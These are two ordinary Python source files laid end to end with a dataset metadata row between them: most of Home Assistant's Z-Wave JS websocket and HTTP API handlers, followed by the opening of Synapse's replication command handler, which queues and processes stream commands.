vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
data = {
"node_id": node.node_id,
"is_routing": node.is_routing,
"status": node.status,
"is_secure": node.is_secure,
"ready": node.ready,
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_state",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_state(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
connection.send_result(
msg[ID],
node.data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/node_metadata",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_node_metadata(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
data = {
"node_id": node.node_id,
"exclusion": node.device_config.metadata.exclusion,
"inclusion": node.device_config.metadata.inclusion,
"manual": node.device_config.metadata.manual,
"wakeup": node.device_config.metadata.wakeup,
"reset": node.device_config.metadata.reset,
"device_database_url": node.device_database_url,
}
connection.send_result(
msg[ID],
data,
)
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/ping_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_ping_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
result = await node.async_ping()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/add_node",
vol.Required(ENTRY_ID): str,
vol.Optional(SECURE, default=False): bool,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_add_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
include_non_secure = not msg[SECURE]
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
@callback
def node_added(event: dict) -> None:
node = event["node"]
interview_unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
unsubs.extend(interview_unsubs)
node_details = {
"node_id": node.node_id,
"status": node.status,
"ready": node.ready,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node added", "node": node_details}
)
)
@callback
def device_registered(device: DeviceEntry) -> None:
device_details = {
"name": device.name,
"id": device.id,
"manufacturer": device.manufacturer,
"model": device.model,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "device registered", "device": device_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("inclusion started", forward_event),
controller.on("inclusion failed", forward_event),
controller.on("inclusion stopped", forward_event),
controller.on("node added", node_added),
async_dispatcher_connect(
hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
),
]
result = await controller.async_begin_inclusion(include_non_secure)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_inclusion",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_inclusion(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
result = await controller.async_stop_inclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_exclusion",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_exclusion(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
result = await controller.async_stop_exclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/remove_node",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("exclusion started", forward_event),
controller.on("exclusion failed", forward_event),
controller.on("exclusion stopped", forward_event),
controller.on("node removed", node_removed),
]
result = await controller.async_begin_exclusion()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/replace_failed_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Optional(SECURE, default=False): bool,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_replace_failed_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
include_non_secure = not msg[SECURE]
node_id = msg[NODE_ID]
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
@callback
def node_added(event: dict) -> None:
node = event["node"]
interview_unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
unsubs.extend(interview_unsubs)
node_details = {
"node_id": node.node_id,
"status": node.status,
"ready": node.ready,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node added", "node": node_details}
)
)
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
@callback
def device_registered(device: DeviceEntry) -> None:
device_details = {
"name": device.name,
"id": device.id,
"manufacturer": device.manufacturer,
"model": device.model,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "device registered", "device": device_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("inclusion started", forward_event),
controller.on("inclusion failed", forward_event),
controller.on("inclusion stopped", forward_event),
controller.on("node removed", node_removed),
controller.on("node added", node_added),
async_dispatcher_connect(
hass, EVENT_DEVICE_ADDED_TO_REGISTRY, device_registered
),
]
result = await controller.async_replace_failed_node(node_id, include_non_secure)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/remove_failed_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_remove_failed_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
node_id = msg[NODE_ID]
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def node_removed(event: dict) -> None:
node = event["node"]
node_details = {
"node_id": node.node_id,
}
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": "node removed", "node": node_details}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [controller.on("node removed", node_removed)]
result = await controller.async_remove_failed_node(node_id)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/begin_healing_network",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_begin_healing_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
result = await controller.async_begin_healing_network()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_heal_network_progress",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_get_entry
async def websocket_subscribe_heal_network_progress(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_event(key: str, event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "heal_node_status": event[key]}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
controller.on("heal network progress", partial(forward_event, "progress")),
controller.on("heal network done", partial(forward_event, "result")),
]
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/stop_healing_network",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_stop_healing_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
result = await controller.async_stop_healing_network()
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/heal_node",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_heal_node(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
controller = client.driver.controller
node_id = msg[NODE_ID]
result = await controller.async_heal_node(node_id)
connection.send_result(
msg[ID],
result,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_info",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_info(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_event(event: dict) -> None:
connection.send_message(
websocket_api.event_message(msg[ID], {"event": event["event"]})
)
@callback
def forward_stage(event: dict) -> None:
connection.send_message(
websocket_api.event_message(
msg[ID], {"event": event["event"], "stage": event["stageName"]}
)
)
connection.subscriptions[msg["id"]] = async_cleanup
msg[DATA_UNSUBSCRIBE] = unsubs = [
node.on("interview started", forward_event),
node.on("interview completed", forward_event),
node.on("interview stage completed", forward_stage),
node.on("interview failed", forward_event),
]
result = await node.async_refresh_info()
connection.send_result(msg[ID], result)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_values",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_values(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
await node.async_refresh_values()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/refresh_node_cc_values",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Required(COMMAND_CLASS_ID): int,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_refresh_node_cc_values(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
command_class_id = msg[COMMAND_CLASS_ID]
try:
command_class = CommandClass(command_class_id)
except ValueError:
connection.send_error(
msg[ID], ERR_NOT_FOUND, f"Command class {command_class_id} not found"
)
return
await node.async_refresh_cc_values(command_class)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/set_config_parameter",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
vol.Required(PROPERTY): int,
vol.Optional(PROPERTY_KEY): int,
vol.Required(VALUE): vol.Any(int, BITMASK_SCHEMA),
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_set_config_parameter(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
property_ = msg[PROPERTY]
property_key = msg.get(PROPERTY_KEY)
value = msg[VALUE]
try:
zwave_value, cmd_status = await async_set_config_parameter(
node, value, property_, property_key=property_key
)
except (InvalidNewValue, NotFoundError, NotImplementedError, SetValueFailed) as err:
code = ERR_UNKNOWN_ERROR
if isinstance(err, NotFoundError):
code = ERR_NOT_FOUND
elif isinstance(err, (InvalidNewValue, NotImplementedError)):
code = ERR_NOT_SUPPORTED
connection.send_error(
msg[ID],
code,
str(err),
)
return
connection.send_result(
msg[ID],
{
VALUE_ID: zwave_value.value_id,
STATUS: cmd_status,
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/get_config_parameters",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_get_config_parameters(
hass: HomeAssistant, connection: ActiveConnection, msg: dict, node: Node
) -> None:
values = node.get_configuration_values()
result = {}
for value_id, zwave_value in values.items():
metadata = zwave_value.metadata
result[value_id] = {
"property": zwave_value.property_,
"property_key": zwave_value.property_key,
"configuration_value_type": zwave_value.configuration_value_type.value,
"metadata": {
"description": metadata.description,
"label": metadata.label,
"type": metadata.type,
"min": metadata.min,
"max": metadata.max,
"unit": metadata.unit,
"writeable": metadata.writeable,
"readable": metadata.readable,
},
"value": zwave_value.value,
}
if zwave_value.metadata.states:
result[value_id]["metadata"]["states"] = zwave_value.metadata.states
connection.send_result(
msg[ID],
result,
)
def filename_is_present_if_logging_to_file(obj: dict) -> dict:
if obj.get(LOG_TO_FILE, False) and FILENAME not in obj:
raise vol.Invalid("`filename` must be provided if logging to file")
return obj
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_log_updates",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_subscribe_log_updates(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
driver = client.driver
@callback
def async_cleanup() -> None:
hass.async_create_task(driver.async_stop_listening_logs())
for unsub in unsubs:
unsub()
@callback
def log_messages(event: dict) -> None:
log_msg: LogMessage = event["log_message"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"type": "log_message",
"log_message": {
"timestamp": log_msg.timestamp,
"level": log_msg.level,
"primary_tags": log_msg.primary_tags,
"message": log_msg.formatted_message,
},
},
)
)
@callback
def log_config_updates(event: dict) -> None:
log_config: LogConfig = event["log_config"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"type": "log_config",
"log_config": dataclasses.asdict(log_config),
},
)
)
msg[DATA_UNSUBSCRIBE] = unsubs = [
driver.on("logging", log_messages),
driver.on("log config updated", log_config_updates),
]
connection.subscriptions[msg["id"]] = async_cleanup
await driver.async_start_listening_logs()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/update_log_config",
vol.Required(ENTRY_ID): str,
vol.Required(CONFIG): vol.All(
vol.Schema(
{
vol.Optional(ENABLED): cv.boolean,
vol.Optional(LEVEL): vol.All(
cv.string,
vol.Lower,
vol.In([log_level.value for log_level in LogLevel]),
lambda val: LogLevel(val),
),
vol.Optional(LOG_TO_FILE): cv.boolean,
vol.Optional(FILENAME): cv.string,
vol.Optional(FORCE_CONSOLE): cv.boolean,
}
),
cv.has_at_least_one_key(
ENABLED, FILENAME, FORCE_CONSOLE, LEVEL, LOG_TO_FILE
),
filename_is_present_if_logging_to_file,
),
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_log_config(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
await client.driver.async_update_log_config(LogConfig(**msg[CONFIG]))
connection.send_result(
msg[ID],
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/get_log_config",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_get_entry
async def websocket_get_log_config(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
connection.send_result(
msg[ID],
dataclasses.asdict(client.driver.log_config),
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/update_data_collection_preference",
vol.Required(ENTRY_ID): str,
vol.Required(OPTED_IN): bool,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_update_data_collection_preference(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
opted_in = msg[OPTED_IN]
update_data_collection_preference(hass, entry, opted_in)
if opted_in:
await async_enable_statistics(client)
else:
await client.driver.async_disable_statistics()
connection.send_result(
msg[ID],
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/data_collection_status",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_data_collection_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
result = {
OPTED_IN: entry.data.get(CONF_DATA_COLLECTION_OPTED_IN),
ENABLED: await client.driver.async_is_statistics_enabled(),
}
connection.send_result(msg[ID], result)
class DumpView(HomeAssistantView):
url = "/api/zwave_js/dump/{config_entry_id}"
name = "api:zwave_js:dump"
async def get(self, request: web.Request, config_entry_id: str) -> web.Response:
if not request["hass_user"].is_admin:
raise Unauthorized()
hass = request.app["hass"]
if config_entry_id not in hass.data[DOMAIN]:
raise web_exceptions.HTTPBadRequest
entry = hass.config_entries.async_get_entry(config_entry_id)
msgs = await dump.dump_msgs(entry.data[CONF_URL], async_get_clientsession(hass))
return web.Response(
body=json.dumps(msgs, indent=2) + "\n",
headers={
hdrs.CONTENT_TYPE: "application/json",
hdrs.CONTENT_DISPOSITION: 'attachment; filename="zwave_js_dump.json"',
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/version_info",
vol.Required(ENTRY_ID): str,
},
)
@websocket_api.async_response
@async_get_entry
async def websocket_version_info(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
version_info = {
"driver_version": client.version.driver_version,
"server_version": client.version.server_version,
"min_schema_version": client.version.min_schema_version,
"max_schema_version": client.version.max_schema_version,
}
connection.send_result(
msg[ID],
version_info,
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/abort_firmware_update",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_node
async def websocket_abort_firmware_update(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
await node.async_abort_firmware_update()
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/subscribe_firmware_update_status",
vol.Required(ENTRY_ID): str,
vol.Required(NODE_ID): int,
}
)
@websocket_api.async_response
@async_get_node
async def websocket_subscribe_firmware_update_status(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
node: Node,
) -> None:
@callback
def async_cleanup() -> None:
for unsub in unsubs:
unsub()
@callback
def forward_progress(event: dict) -> None:
progress: FirmwareUpdateProgress = event["firmware_update_progress"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"event": event["event"],
"sent_fragments": progress.sent_fragments,
"total_fragments": progress.total_fragments,
},
)
)
@callback
def forward_finished(event: dict) -> None:
finished: FirmwareUpdateFinished = event["firmware_update_finished"]
connection.send_message(
websocket_api.event_message(
msg[ID],
{
"event": event["event"],
"status": finished.status,
"wait_time": finished.wait_time,
},
)
)
msg[DATA_UNSUBSCRIBE] = unsubs = [
node.on("firmware update progress", forward_progress),
node.on("firmware update finished", forward_finished),
]
connection.subscriptions[msg["id"]] = async_cleanup
connection.send_result(msg[ID])
class FirmwareUploadView(HomeAssistantView):
url = r"/api/zwave_js/firmware/upload/{config_entry_id}/{node_id:\d+}"
name = "api:zwave_js:firmware:upload"
async def post(
self, request: web.Request, config_entry_id: str, node_id: str
) -> web.Response:
if not request["hass_user"].is_admin:
raise Unauthorized()
hass = request.app["hass"]
if config_entry_id not in hass.data[DOMAIN]:
raise web_exceptions.HTTPBadRequest
entry = hass.config_entries.async_get_entry(config_entry_id)
client: Client = hass.data[DOMAIN][config_entry_id][DATA_CLIENT]
node = client.driver.controller.nodes.get(int(node_id))
if not node:
raise web_exceptions.HTTPNotFound
request._client_max_size = 1024 * 1024 * 10
data = await request.post()
if "file" not in data or not isinstance(data["file"], web_request.FileField):
raise web_exceptions.HTTPBadRequest
uploaded_file: web_request.FileField = data["file"]
try:
await begin_firmware_update(
entry.data[CONF_URL],
node,
uploaded_file.filename,
await hass.async_add_executor_job(uploaded_file.file.read),
async_get_clientsession(hass),
)
except BaseZwaveJSServerError as err:
raise web_exceptions.HTTPBadRequest from err
return self.json(None)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/check_for_config_updates",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_check_for_config_updates(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
config_update = await client.driver.async_check_for_config_updates()
connection.send_result(
msg[ID],
{
"update_available": config_update.update_available,
"new_version": config_update.new_version,
},
)
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "zwave_js/install_config_update",
vol.Required(ENTRY_ID): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_entry
async def websocket_install_config_update(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict,
entry: ConfigEntry,
client: Client,
) -> None:
success = await client.driver.async_install_config_update()
connection.send_result(msg[ID], success)
| true | true |
1c303f3a46d81485b23495f71918a4a72f230c12 | 27,316 | py | Python | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | 1 | 2020-10-10T13:23:05.000Z | 2020-10-10T13:23:05.000Z | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | null | null | null | synapse/replication/tcp/handler.py | Erethon/synapse | d13863d6eb4b3a1ce1ca4a702ae30d4f8808e51f | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2017 Vector Creations Ltd
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import (
Any,
Awaitable,
Dict,
Iterable,
Iterator,
List,
Optional,
Set,
Tuple,
TypeVar,
Union,
)
from prometheus_client import Counter
from typing_extensions import Deque
from twisted.internet.protocol import ReconnectingClientFactory
from synapse.metrics import LaterGauge
from synapse.metrics.background_process_metrics import run_as_background_process
from synapse.replication.tcp.client import DirectTcpReplicationClientFactory
from synapse.replication.tcp.commands import (
ClearUserSyncsCommand,
Command,
FederationAckCommand,
PositionCommand,
RdataCommand,
RemoteServerUpCommand,
RemovePusherCommand,
ReplicateCommand,
UserIpCommand,
UserSyncCommand,
)
from synapse.replication.tcp.protocol import AbstractConnection
from synapse.replication.tcp.streams import (
STREAMS_MAP,
BackfillStream,
CachesStream,
EventsStream,
FederationStream,
Stream,
TypingStream,
)
logger = logging.getLogger(__name__)
# number of updates received for each RDATA stream
inbound_rdata_count = Counter(
"synapse_replication_tcp_protocol_inbound_rdata_count", "", ["stream_name"]
)
user_sync_counter = Counter("synapse_replication_tcp_resource_user_sync", "")
federation_ack_counter = Counter("synapse_replication_tcp_resource_federation_ack", "")
remove_pusher_counter = Counter("synapse_replication_tcp_resource_remove_pusher", "")
user_ip_cache_counter = Counter("synapse_replication_tcp_resource_user_ip_cache", "")
# the type of the entries in _command_queues_by_stream
_StreamCommandQueue = Deque[
Tuple[Union[RdataCommand, PositionCommand], AbstractConnection]
]
class ReplicationCommandHandler:
"""Handles incoming commands from replication as well as sending commands
back out to connections.
"""
def __init__(self, hs):
self._replication_data_handler = hs.get_replication_data_handler()
self._presence_handler = hs.get_presence_handler()
self._store = hs.get_datastore()
self._notifier = hs.get_notifier()
self._clock = hs.get_clock()
self._instance_id = hs.get_instance_id()
self._instance_name = hs.get_instance_name()
self._streams = {
stream.NAME: stream(hs) for stream in STREAMS_MAP.values()
} # type: Dict[str, Stream]
# List of streams that this instance is the source of
self._streams_to_replicate = [] # type: List[Stream]
for stream in self._streams.values():
if stream.NAME == CachesStream.NAME:
# All workers can write to the cache invalidation stream.
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, (EventsStream, BackfillStream)):
# Only add EventStream and BackfillStream as a source on the
# instance in charge of event persistence.
if hs.config.worker.writers.events == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
if isinstance(stream, TypingStream):
# Only add TypingStream as a source on the instance in charge of
# typing.
if hs.config.worker.writers.typing == hs.get_instance_name():
self._streams_to_replicate.append(stream)
continue
# Only add any other streams if we're on master.
if hs.config.worker_app is not None:
continue
if stream.NAME == FederationStream.NAME and hs.config.send_federation:
# We only support federation stream if federation sending
# has been disabled on the master.
continue
self._streams_to_replicate.append(stream)
# Map of stream name to batched updates. See RdataCommand for info on
# how batching works.
self._pending_batches = {} # type: Dict[str, List[Any]]
# The factory used to create connections.
self._factory = None # type: Optional[ReconnectingClientFactory]
# The currently connected connections. (The list of places we need to send
# outgoing replication commands to.)
self._connections = [] # type: List[AbstractConnection]
LaterGauge(
"synapse_replication_tcp_resource_total_connections",
"",
[],
lambda: len(self._connections),
)
# When POSITION or RDATA commands arrive, we stick them in a queue and process
# them in order in a separate background process.
# the streams which are currently being processed by _unsafe_process_queue
self._processing_streams = set() # type: Set[str]
# for each stream, a queue of commands that are awaiting processing, and the
# connection that they arrived on.
self._command_queues_by_stream = {
stream_name: _StreamCommandQueue() for stream_name in self._streams
}
# For each connection, the incoming stream names that have received a POSITION
# from that connection.
self._streams_by_connection = {} # type: Dict[AbstractConnection, Set[str]]
LaterGauge(
"synapse_replication_tcp_command_queue",
"Number of inbound RDATA/POSITION commands queued for processing",
["stream_name"],
lambda: {
(stream_name,): len(queue)
for stream_name, queue in self._command_queues_by_stream.items()
},
)
self._is_master = hs.config.worker_app is None
self._federation_sender = None
if self._is_master and not hs.config.send_federation:
self._federation_sender = hs.get_federation_sender()
self._server_notices_sender = None
if self._is_master:
self._server_notices_sender = hs.get_server_notices_sender()
def _add_command_to_stream_queue(
self, conn: AbstractConnection, cmd: Union[RdataCommand, PositionCommand]
) -> None:
"""Queue the given received command for processing
Adds the given command to the per-stream queue, and processes the queue if
necessary
"""
stream_name = cmd.stream_name
queue = self._command_queues_by_stream.get(stream_name)
if queue is None:
logger.error("Got %s for unknown stream: %s", cmd.NAME, stream_name)
return
queue.append((cmd, conn))
# if we're already processing this stream, there's nothing more to do:
# the new entry on the queue will get picked up in due course
if stream_name in self._processing_streams:
return
# fire off a background process to start processing the queue.
run_as_background_process(
"process-replication-data", self._unsafe_process_queue, stream_name
)
async def _unsafe_process_queue(self, stream_name: str):
"""Processes the command queue for the given stream, until it is empty
Does not check if there is already a thread processing the queue, hence "unsafe"
"""
assert stream_name not in self._processing_streams
self._processing_streams.add(stream_name)
try:
queue = self._command_queues_by_stream.get(stream_name)
while queue:
cmd, conn = queue.popleft()
try:
await self._process_command(cmd, conn, stream_name)
except Exception:
logger.exception("Failed to handle command %s", cmd)
finally:
self._processing_streams.discard(stream_name)
async def _process_command(
self,
cmd: Union[PositionCommand, RdataCommand],
conn: AbstractConnection,
stream_name: str,
) -> None:
if isinstance(cmd, PositionCommand):
await self._process_position(stream_name, conn, cmd)
elif isinstance(cmd, RdataCommand):
await self._process_rdata(stream_name, conn, cmd)
else:
# This shouldn't be possible
raise Exception("Unrecognised command %s in stream queue", cmd.NAME)
def start_replication(self, hs):
"""Helper method to start a replication connection to the remote server
using TCP.
"""
